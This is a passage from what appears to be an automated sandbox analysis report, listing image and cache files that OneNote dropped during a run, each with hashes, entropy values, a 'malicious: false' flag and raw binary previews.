Preview:	2...>.......l...v...`...................................................................................................................................2...>...H.......v................................I.......I.qk..B.....LZ..............p..Wg~.........p..Wg~........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............a.C.I.4....j.0....N...^...................[}H.H.N...........f........................................I.qk..B.....LZ..............a.C.I.4....j.0..........a.C.I.4....j.0........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.33290148337722
Encrypted:	false
SSDEEP:	48:asq0u8sivitMBi7PEXDJV2Xpb9hsbpyRrdMrVP45FXX9T/xWeyw9:asK/iviKBiTEXyXpb9hiURMB45r/YeT
MD5:	AFB3B249032F6230CCD7180868C4D3C8
SHA1:	094616EA257A89065A2EB108464C95CDB9BE537F
SHA-256:	2B85C6EED121B2FEA3D77D3350EF54C34C78F5002DA899B948AE9177CED2F5F5
SHA-512:	9DC75C9328FC336D5D428DABBA470452F0D28C7A1CA0512CFCBF03E7BF1D400B07127FE4F3F9B0E28318FF8A69F68007640EE1F092640E255E00EA4AF4DFD23A
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ...........tJ....c...x.)...tJ....c...x.).....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............;7...l....H3.6......N...^....................G.s...GS........f........................................I.qk..B.....LZ............;7...l....H3.6..........;7...l....H3.6..........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	60924
Entropy (8bit):	7.758472758205366
Encrypted:	false
SSDEEP:	1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
MD5:	D58C51D2CF586A5E14A9EC8529C3B0A8
SHA1:	F4811A353797C29B1E3F5A61B125C46E1534D587
SHA-256:	F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
SHA-512:	34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.........................................................yK..xd...6..\|%....\j..e.=...Y..f..I.\|-....e...$R.j.......~.W#....{.....V.k.\|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.\|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.......................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.286814487695656
Encrypted:	false
SSDEEP:	48:HnwsEvMbvAtOXEJtkEXSt/9xsDpyRrdMrz07FXGCA9VZr5:HnwsvbvAGE1XY9xKsRMQ7Qr
MD5:	AFE438B79770AB450396FE49D913A00B
SHA1:	B8F97105DFEFD9C9E7535A6540B176E7F45A57C9
SHA-256:	2B5E784ADCA330456B30C524263CD81AF061E997A27B980F798B71F08605684A
SHA-512:	7E44B0DDB55B2565A09E0CAB03701395B1BC69FB864A3495BDC519B9D7422329B61844256D3D37CBBD8314978B4F400382B90D819844AF5C3762B6F247062243
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..............v.....w(-.......v.....w(-......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............Jz.E....a..loM....N...^...................._@......7.........f........................................I.qk..B.....LZ..............Jz.E....a..loM..........Jz.E....a..loM........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 579, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	515
Entropy (8bit):	6.740133870626016
Encrypted:	false
SSDEEP:	12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
MD5:	E96BE30D892A5412CF262FEE652921CA
SHA1:	8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
SHA-256:	0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
SHA-512:	D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
Malicious:	false
Preview:	.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.313902642320062
Encrypted:	false
SSDEEP:	48:kRfsbLsbjtLzEPA83ZXJ9psXpyBrdMrVOF2mFXjsHIYog:kRfscbjFEP1XJ9peERMYF2mio
MD5:	157277BB217B9175AD90A1CC163AED24
SHA1:	33A4D34931927CFB510DFCA5BF26A42D18EB425B
SHA-256:	C8C8051BE98662945DF4C6975F6EB34B8CD332E00A1735DC6973FDE679D07C15
SHA-512:	286BC0F984853501B116ACA6A5CFBAD69084CD5467860A5D8EA0250EC474DAF87FCF9F48CF98295870E45370326320C1E25130A75790659B1C4FDE3E06B673D7
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZg.R.....g.R,.......A.n.Wg.R,.......A.n.Wg.R..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............-l.ea_"..f..)y{.....N...^....................I.@..T ..&........f........................................I.qk..B.....LZ............-l.ea_"..f..)y{.........-l.ea_"..f..)y{..........g.R.....g.R.....g.R.........................................g.Rj....g.RT.]..g.R.....g.R..B..g.RH....g.R..B..g.R..>.)g.R..J...................;........4...4...4.."..............g.R.g.R.g.R..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........g.R.....g.R....#g.R............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 30 x 700, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1547
Entropy (8bit):	6.4194805172468286
Encrypted:	false
SSDEEP:	24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
MD5:	0BA36A74DFBF411FAB348404CCEC3348
SHA1:	4C619790E517416E178161028987DF1CD3B871CC
SHA-256:	2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
SHA-512:	90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
Malicious:	false
Preview:	.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.335017881177145
Encrypted:	false
SSDEEP:	96:GsMgLjTW+Lsy7fPERBXf5B9W0olRMvBjcSI:GsMgXTWqp78RBXf5B9TolRMvBjcS
MD5:	C5810F0A0E8D89F0AF1D1BBF11BF08DF
SHA1:	80FE9311B929B5945C6A842ACA3B88FB9972D458
SHA-256:	DA9F8ECB015DD195D5233CF87ADBF3DFBA1748A9B6DC15D305689AAB3D4433A4
SHA-512:	C26FCC160A28D4AC615EBE75BB41FC822785CFF545CA64CC6C74C61DCD7653C8E0EAF1630F86E9498104F4A34EC683615567E7982C9EC53D242B6A04AAB1DF2F
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.............W..+.H.g........W..+.H.g........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............?E~ gL.?..t..%.....N...^..................^.5.H.t_.............f........................................I.qk..B.....LZ.............?E~ gL.?..t..%..........?E~ gL.?..t..%.........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000080.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	95763
Entropy (8bit):	7.931689087616878
Encrypted:	false
SSDEEP:	1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
MD5:	177DD42CA99CAA2CCBF2974221680334
SHA1:	35FD86B3DD082A6D4930C67BC0E05D3B5817465A
SHA-256:	525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
SHA-512:	6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=\|..`2. v..t......U.8.u.. ...'...*...2;u....& 3..$.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.318921545333139
Encrypted:	false
SSDEEP:	96:SsftZgvJq9Ey00Xv9CvcRMV2hCu375/LEKEvc:SsfvgvJry/Xv9ocRMVhuL5/L
MD5:	95F752F325DE4086602838E1D6F24750
SHA1:	5CE31D2063FA87782F57DE38F2F61962D9D1D041
SHA-256:	20778DCBEA98026EF6911417EAE0C092D19F2CFAE760ED47C30743C25C75E376
SHA-512:	356C5B09B8E1D9B208ACEB774423E8294F2CB2DD915E3580298E137AAD31EB00C498F438FC59387FCF5CCDC1AC39B6D4A92C4EF2D07C8987F6C2884380FDEA0A
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ./......./.9....8. q..I./.9....8. q..I./...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............^......(..r$....N...^...............a.z.g.P@.('.-.>d........f........................................I.qk..B.....LZ.............^......(..r$.........^......(..r$........../......./......./.........................................../.j...../.T.].../......./..B.../.H...../...B.../...>.)./...J...................;........4...4...4..".............../.../.../...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........../......./.....#./.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000082.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	67991
Entropy (8bit):	7.870481231782746
Encrypted:	false
SSDEEP:	1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
MD5:	1271B1905D18A40D79A5B9DB27EE97EA
SHA1:	9618608FBD7342DE6C71220A36C3F4995BA9C13E
SHA-256:	5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
SHA-512:	C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..\|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....\|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi.k..?#..._...X..R.&]..[..;../]L..f..V.......e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.348959926355703
Encrypted:	false
SSDEEP:	96:tb6sx5nsh1T+7QmzEdyXE9iQ61RM7Ep4f2jhQXT4+eD2ked:tb6sxhshR+edyXE9D61RM744f2jhQXTl
MD5:	1C922FF74E97BD0CFEBE7A634C982952
SHA1:	3E62367872FC226F23E0ADF5C416D80A131EC425
SHA-256:	F748C8BE14C2849CC4E06EEA77E38B8B087102D508364B058DA131D6F5474CE8
SHA-512:	B571EE69785D0D1A4EC77F74C96D7FD3820FADD029D3EFC85015C9D24D950FE430B4FCC1B46B6F8031CC66CEAD359283726F401702BB46E2237F6E687509174C
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................&.......&.2.#J.;...R.4..I.......I.qk..B.....LZ.&.2.#J.;...R.4..&...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............._...]V..6w..Q.q%....N...^.................f...=B.....Xk........f........................................I.qk..B.....LZ............_...]V..6w..Q.q%........_...]V..6w..Q.q%..........&.......&.......&...........................................&.j.....&.T.]...&.......&...B...&.H.....&...B...&...>.).&...J...................;........4...4...4.."...............&...&...&...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........&.......&.....#.&.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000084.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.443169619142964
Encrypted:	false
SSDEEP:	96:cG7s5U8lMKPEDOXf92a0RMv85S7bvSZTp2:cG7su8d8DOXf950RMv8M
MD5:	DDDCF6C93F4756113E64C3779AFB0AEF
SHA1:	D8A7A9C57CE9037CEFD1DD75527AB2B2343DA9B6
SHA-256:	2ECAEB18286A0D381E870217D65C1E1CB345F5737E7B89742F3592CCF9B4DE25
SHA-512:	2063F40246EA81620438AE15A6A540B0A4F2C11CF004E39D907859F17B59D6DB4D432FA87340EC8B4F0F5695BEFA5558E78AE817BBC4A52BE7964D69F3F9AA9F
Malicious:	false
Preview:	2...>.......l...v...`...................................................................................................................................2...>...H.......v................................I.......I.qk..B.....LZrU......rU.q4..9.....prU.q4..9.....prU...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............."......4.[..%......N...^..................VPT.E..Z..\(.........f........................................I.qk..B.....LZ............."......4.[..%..........."......4.[..%...........rU......rU......rU..........................................rU.j....rU.T.]..rU......rU...B..rU.H....rU...B..rU...>.)rU...J...................;........4...4...4.."..............rU..rU..rU...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........rU......rU.....#rU.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000086.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.303440099836398
Encrypted:	false
SSDEEP:	48:asz1zgS12tHX11EAkLPEjzXXn91UrpyZrdMrEkSImCFXJ9fpA+d:asuS12lX3EjAzXXn9GrERMEkSIxvx
MD5:	EAD7B5E95A13E146FA731254F6C4F36B
SHA1:	E26F82D6A9515ABE3C9DC579B80F7AC9747C3C78
SHA-256:	C11C7A28EC607B2EEC50277479875F73F3D46FE066B7CDFE652D118C368B0DC9
SHA-512:	6849CE7B25BE5170502685EDDCB45C46F5DCB756ED22EA8BD3524C958FC905E41BDA4990F0F258786D09197C3BF99BB34D90A244A8796B289A30BCE2A67CCDAF
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ..................r....$..........r....$.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............9..9..@....YL....N...^......................J.,L.............f........................................I.qk..B.....LZ..............9..9..@....YL..........9..9..@....YL........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000088.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	86187
Entropy (8bit):	7.951356272886186
Encrypted:	false
SSDEEP:	1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
MD5:	FEE4785DF76E93A9DC2F4501CBAEAE12
SHA1:	8FB4527BDE05EF208FCDB168098A07707C27501F
SHA-256:	F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
SHA-512:	7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....\|.,lZKCEB.t...fw\|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..WH<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.64941333451561
Encrypted:	false
SSDEEP:	96:4stdeS95JpEtUBJRXsT9yvvsRM9YyUCsJ:4stV954KnRXI940RM9YyUCc
MD5:	1B8377A482637CD9ED97C6154C79BF3C
SHA1:	764256B8A7420299977C6120CCF045C14DAC6201
SHA-256:	9D1AD86CC6CB88C032423C5B36B91E220D83E1EE6E1743CB41EF43F4654F0F59
SHA-512:	5962B885989829D0DBABEC969D1633D64DECF49AF0F409BFBF1E78E4FF0A8C446FEABCE3703BEAE60F372E603DA4AE1ED5DA4F72E1DD4E318DEB8CFF06589F9E
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>...t.......v...............................R.......R..n2G.......-1.I.......I.qk..B.....LZR..n2G.......-1R....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............q......[..3~.~....N...^.................L`...@.>j............f...................................H....I.qk..B.....LZ..............q......[..3~.~..........q......[..3~.~.........R.......R.......R...........................................R..j....R..T.]..R.......R....B..R..H....R....B..R....>.)R....J...................;........4...4...4.."..............R...R...R....z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........R.......R......#R..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 85 x 470, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11197
Entropy (8bit):	7.975073010774664
Encrypted:	false
